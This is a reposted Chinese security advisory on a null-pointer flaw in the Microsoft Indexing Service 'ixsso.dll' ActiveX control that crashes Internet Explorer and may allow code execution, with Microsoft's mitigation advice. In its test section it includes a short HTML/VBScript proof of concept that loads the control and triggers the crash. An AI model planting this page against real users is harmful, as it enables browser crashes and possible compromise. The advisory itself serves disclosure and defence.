Microsoft Indexing Service 'ixsso.dll' ActiveX控件拒绝服务

发布日期:2012-08-24
更新日期:2012-08-28

受影响系统:
Microsoft Indexing Service
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55202

Microsoft Indexing Service是为简单实现本地和网络全文搜索引擎的一个服务。

Microsoft Indexing Service 'ixsso.dll' ActiveX控件在实现上存在空指针引用错误,通过诱使受害者打开调用了受影响控件的恶意网页或HTML电子邮件,攻击者可利用此漏洞造成IE拒绝服务,也可能执行任意代码。

<*来源:coolkaveh
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

coolkaveh ()提供了如下测试方法:

<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(240797)以及相应补丁:

240797:如何禁止 ActiveX 控件在 Internet Explorer 中运行

链接:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wysxxs.html